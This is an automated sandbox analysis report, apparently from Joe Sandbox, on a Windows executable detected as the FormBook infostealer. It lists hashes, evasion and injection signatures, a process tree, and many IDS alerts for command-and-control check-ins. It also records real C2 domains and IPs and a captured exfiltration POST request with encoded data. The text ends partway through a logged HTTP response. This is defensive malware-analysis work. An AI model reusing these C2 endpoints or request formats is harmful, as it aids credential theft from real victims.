Windows Analysis Report
JJ0tnjLiDS.exe

Overview

General Information

Sample name: JJ0tnjLiDS.exe (renamed because original name is a hash value)
Original sample name: 7176873d83d97247c18a9037ffa5964f.exe
Analysis ID: 1612323
MD5: 7176873d83d97247c18a9037ffa5964f
SHA1: 0a0a23e6b839f0e588d422b3d376c4658b1978de
SHA256: 7c421b3dfe5e73aaffae7fa858d1a1628d6dc09c7eccbcfbb42f027e20c0ac70
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • JJ0tnjLiDS.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\JJ0tnjLiDS.exe" MD5: 7176873D83D97247C18A9037FFA5964F)
    • x6fGRpae78G.exe (PID: 3556 cmdline: "C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\vIQ6QcdyNxOK.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • systray.exe (PID: 6408 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
        • x6fGRpae78G.exe (PID: 5512 cmdline: "C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\i6aszNJ9x.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • firefox.exe (PID: 2300 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source: 00000004.00000002.4496129166.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000000.00000002.2472795382.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000000.00000002.2472836212.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000006.00000002.4498458965.0000000005870000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000004.00000002.4495153571.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 0.2.JJ0tnjLiDS.exe.cd0000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
No Sigma rule has matched

              AV Detection

              Source: JJ0tnjLiDS.exe, Avira: detected
              Source: http://www.bjogo.top/zl05/, Avira URL Cloud: Label: malware
              Source: http://www.bjogo.top/zl05/?qv=AWdBDJ+GqNUS2XFGJXspkqvu8fMaqBTyvpNObziMfhQkMcZeRNcLYnQ+YBY+SC9LdAZXvp8klsLVctGiAigj2rUf1EKTbgIlvnhcXDfrRl6QUw16w4+KIppI87woBLyMdg==&mdTH1=bxE0iX4XoFeHD, Avira URL Cloud: Label: malware
              Source: JJ0tnjLiDS.exe, Virustotal: Detection: 61%
              Source: JJ0tnjLiDS.exe, ReversingLabs: Detection: 64%
              Source: Yara match, File source: 0.2.JJ0tnjLiDS.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000004.00000002.4496129166.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2472795382.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2472836212.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: 00000006.00000002.4498458965.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.4495153571.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.4496072486.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000002.4496171848.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2473305146.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
              Source: JJ0tnjLiDS.exe, Joe Sandbox ML: detected
              Source: JJ0tnjLiDS.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: JJ0tnjLiDS.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: systray.pdb source: JJ0tnjLiDS.exe, 00000000.00000003.2441837305.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000002.4495681865.00000000012AE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: systray.pdbGCTL source: JJ0tnjLiDS.exe, 00000000.00000003.2441837305.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000002.4495681865.00000000012AE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: JJ0tnjLiDS.exe, 00000000.00000002.2472917406.000000000122E000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000002.2472917406.0000000001090000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2378014479.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2379955192.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.2474650543.0000000005010000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.2472850298.0000000004E63000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.000000000535E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: JJ0tnjLiDS.exe, JJ0tnjLiDS.exe, 00000000.00000002.2472917406.000000000122E000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000002.2472917406.0000000001090000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2378014479.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2379955192.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000003.2474650543.0000000005010000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.2472850298.0000000004E63000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.000000000535E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: x6fGRpae78G.exe, 00000003.00000002.4495152615.0000000000A5F000.00000002.00000001.01000000.00000005.sdmp, x6fGRpae78G.exe, 00000006.00000002.4495151605.0000000000A5F000.00000002.00000001.01000000.00000005.sdmp
              Source: C:\Windows\SysWOW64\systray.exe, Code function: 4_2_0321CA20 FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Windows\SysWOW64\systray.exe, Code function: 4x nop then xor eax, eax (4_2_03209F60)
              Source: C:\Windows\SysWOW64\systray.exe, Code function: 4x nop then mov ebx, 00000004h (4_2_04FA04BF)

              Networking

              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49941 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49984 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49977 -> 188.114.97.3:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 199.59.243.228:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 106.54.8.254:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 129.226.111.122:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 106.54.8.254:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 188.114.96.3:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 188.114.96.3:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 106.54.8.254:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49992 -> 188.114.96.3:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 188.114.96.3:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49978 -> 188.114.97.3:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 209.74.64.58:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50000 -> 209.74.64.58:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49980 -> 188.114.97.3:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50008 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 209.74.64.58:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 199.59.243.228:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 104.214.171.173:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 156.224.194.237:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 188.114.96.3:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50016 -> 104.214.171.173:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49996 -> 106.54.8.254:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49979 -> 188.114.97.3:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 156.224.194.237:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50026 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 104.214.171.173:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 209.74.64.58:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 129.226.111.122:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49988 -> 199.59.243.228:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50012 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 104.214.171.173:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 156.224.194.237:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 129.226.111.122:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 188.114.96.3:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50028 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 188.114.96.3:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 199.59.243.228:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50024 -> 188.114.96.3:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 129.226.111.122:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 13.248.169.48:80
              Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 156.224.194.237:80
              Source: DNS query: www.zkplant.xyz
              Source: DNS query: www.meacci.xyz
              Source: DNS query: www.limiles.xyz
              Source: DNS query: www.ticquan.xyz
              Source: DNS query: www.nullus.xyz
              Source: DNS query: www.bitcoinvendor.xyz
              Source: Joe Sandbox View, IP Address: 13.248.169.48
              Source: Joe Sandbox View, IP Address: 188.114.97.3
              Source: Joe Sandbox View, ASN Name: MICROSOFT-CORP-MSN-AS-BLOCK, US
              Source: Joe Sandbox View, ASN Name: CLOUDFLARENET, US
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownHTTP traffic detected: POST /gc4d/ HTTP/1.1Host: www.adventurerepair24.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.adventurerepair24.liveReferer: http://www.adventurerepair24.live/gc4d/Cache-Control: no-cacheContent-Length: 203Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36Data Raw: 71 76 3d 47 63 7a 6c 65 72 77 34 62 50 4a 55 76 6a 55 75 57 4b 4b 75 4e 57 58 4d 6f 52 41 63 30 4e 36 4e 4f 79 32 2b 72 6e 33 62 4f 7a 72 46 79 53 69 71 4b 63 57 42 38 67 77 36 78 4e 73 38 38 62 73 72 63 56 51 51 33 6b 51 70 65 2f 4d 33 6c 32 38 58 31 46 56 43 6d 2b 4c 72 45 46 50 37 65 36 62 66 64 6d 46 4f 33 7a 31 6d 49 67 4e 46 35 6e 70 70 33 4e 34 63 6c 2b 52 36 7a 6d 45 35 6c 46 31 78 56 30 78 72 2b 61 51 51 32 4d 4e 6c 56 4d 70 71 41 7a 70 6c 57 70 72 67 6f 41 69 35 61 61 52 33 51 32 50 78 30 74 48 33 66 57 4b 75 58 61 4f 55 4c 44 44 38 6e 50 6c 77 79 56 61 70 4a 4b 44 57 4a 77 38 6e 6a 52 63 3d Data Ascii: qv=Gczlerw4bPJUvjUuWKKuNWXMoRAc0N6NOy2+rn3bOzrFySiqKcWB8gw6xNs88bsrcVQQ3kQpe/M3l28X1FVCm+LrEFP7e6bfdmFO3z1mIgNF5npp3N4cl+R6zmE5lF1xV0xr+aQQ2MNlVMpqAzplWprgoAi5aaR3Q2Px0tH3fWKuXaOULDD8nPlwyVapJKDWJw8njRc=
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:12:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rXkTg95HlNZdR6E2Yd%2BgH2b%2BkmrvMfU44FkoA4WHj4LL9jbk9IaCKUttWtRpzzYt2hnXpUT0674%2BeOG9HEC1YNvoogylxvTrLykdBF9lGmcdf5l6qeLHLPUN6W35pw3N36ATVpfsOQNNTA8osA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9105f66d4eda443e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1660&rtt_var=830&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=826&delivery_rate=0&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 14 84 ef f9 15 cf 3d e9 c1 bc 6e a9 e0 e1 11 70 b7 5d 5c a8 6b d1 f6 e0 31 6b de 92 42 6d 6a 92 b6 f8 ef a5 5d 04 af 33 df 0c 33 74 93 bf ee eb 8f aa 80 e7 fa a5 84 aa d9 95 c7 3d 6c ee 11 8f 45 7d 40 cc eb fc ea a4 32 41 2c 4e 1b 25 c8 c6 af 4e 91 65 6d 94 a0 d8 c6 8e 55 96 64 70 72 11 0e 6e ec 0d e1 55 14 84 2b 44 67 67 7e 96 dc 56 fd 63 ec 56 09 1a 54 6d 19 3c 7f 8f 1c 22 1b 68 de 4a 98 75 80 de 45 b8 2c 1c b8 1e a2 6d 03 04 f6 13 7b 49 38 2c 4d 5e 09 d2 c6 78 0e 41 3d 0d fa d3 32 a6 32 93 0f 29 dc 36 e7 b1 8f e3 1d bc af 01 d0 11 e6 79 96 da 4c dc c7 d1 b3 e7 41 b7 3e cd 64 d7 4e 0c 95 f3 11 1e 13 c2 bf 32 41 b8 ae 25 5c 5f fe 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 24 e8 d3 ed 20 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eaLAK0=np]\k1kBmj]33t=lE}@2A,N%NemUdprnU+Dgg~VcVTm<"hJuE,m{I8,M^xA=22)6yLA>dN2A%\_b$ 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:12:16 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LyyqF0fCAK6v4i4mPnLKPNVbH7HV75tjaTauMxIKNNz9kIqkoZM2IhAhXPFwDkFTkdgiISDDISUFSoSYYVmhN0ORiaGa%2FKKHIV7knb5327TyWGoQuNH21cnV27PqcR3EsyaMt20xkuYcIeH1Ew%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9105f67dcba04352-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2021&rtt_var=1010&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=846&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 14 84 ef f9 15 cf 3d e9 c1 bc 6e a9 e0 e1 11 70 b7 5d 5c a8 6b d1 f6 e0 31 6b de 92 42 6d 6a 92 b6 f8 ef a5 5d 04 af 33 df 0c 33 74 93 bf ee eb 8f aa 80 e7 fa a5 84 aa d9 95 c7 3d 6c ee 11 8f 45 7d 40 cc eb fc ea a4 32 41 2c 4e 1b 25 c8 c6 af 4e 91 65 6d 94 a0 d8 c6 8e 55 96 64 70 72 11 0e 6e ec 0d e1 55 14 84 2b 44 67 67 7e 96 dc 56 fd 63 ec 56 09 1a 54 6d 19 3c 7f 8f 1c 22 1b 68 de 4a 98 75 80 de 45 b8 2c 1c b8 1e a2 6d 03 04 f6 13 7b 49 38 2c 4d 5e 09 d2 c6 78 0e 41 3d 0d fa d3 32 a6 32 93 0f 29 dc 36 e7 b1 8f e3 1d bc af 01 d0 11 e6 79 96 da 4c dc c7 d1 b3 e7 41 b7 3e cd 64 d7 4e 0c 95 f3 11 1e 13 c2 bf 32 41 b8 ae 25 5c 5f fe 02 00 00 ff ff 0d 0a Data Ascii: eaLAK0=np]\k1kBmj]33t=lE}@2A,N%NemUdprnU+Dgg~VcVTm<"hJuE,m{I8,M^xA=22)6yLA>dN2A%\_
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:12:18 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hARtj1MqzcL2HUCnhdiGi%2BuG9%2F6KUFwhC3neMCtNzshhijLCOftRAvtiQc88DjMmLwvY1E9wgyLzhPdrs01OYbfUs6Mv3eXrPUdn32%2BNrRmEU1zC4sgiFbRRyRc1ilgavlO%2BcC5zFIRAfJAReA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9105f68d2f5d15a3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1901&min_rtt=1901&rtt_var=950&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1863&delivery_rate=0&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 14 84 ef f9 15 cf 3d e9 c1 bc 6e a9 e0 e1 11 70 b7 5d 5c a8 6b d1 f6 e0 31 6b de 92 42 6d 6a 92 b6 f8 ef a5 5d 04 af 33 df 0c 33 74 93 bf ee eb 8f aa 80 e7 fa a5 84 aa d9 95 c7 3d 6c ee 11 8f 45 7d 40 cc eb fc ea a4 32 41 2c 4e 1b 25 c8 c6 af 4e 91 65 6d 94 a0 d8 c6 8e 55 96 64 70 72 11 0e 6e ec 0d e1 55 14 84 2b 44 67 67 7e 96 dc 56 fd 63 ec 56 09 1a 54 6d 19 3c 7f 8f 1c 22 1b 68 de 4a 98 75 80 de 45 b8 2c 1c b8 1e a2 6d 03 04 f6 13 7b 49 38 2c 4d 5e 09 d2 c6 78 0e 41 3d 0d fa d3 32 a6 32 93 0f 29 dc 36 e7 b1 8f e3 1d bc af 01 d0 11 e6 79 96 da 4c dc c7 d1 b3 e7 41 b7 3e cd 64 d7 4e 0c 95 f3 11 1e 13 c2 bf 32 41 b8 ae 25 5c 5f fe 02 00 00 ff ff e3 02 00 24 e8 d3 ed 20 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5LAK0=np]\k1kBmj]33t=lE}@2A,N%NemUdprnU+Dgg~VcVTm<"hJuE,m{I8,M^xA=22)6yLA>dN2A%\_$ 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:12:21 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FindNOKJTmj5elwLTnOvgAMpoZhkIz7AwlURXPtuM4gbGbdl1Y6XDAyGumLi6Nstj%2BysXDdel7HFAbFKpKBMTqki6qPg5zaA6WyVhuC%2FdExtrZ2Skc4PvZX7XzsmSOVBq0ad%2FF5BrREponXAiA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9105f69cfeb842f4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1833&rtt_var=916&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=554&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 32 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 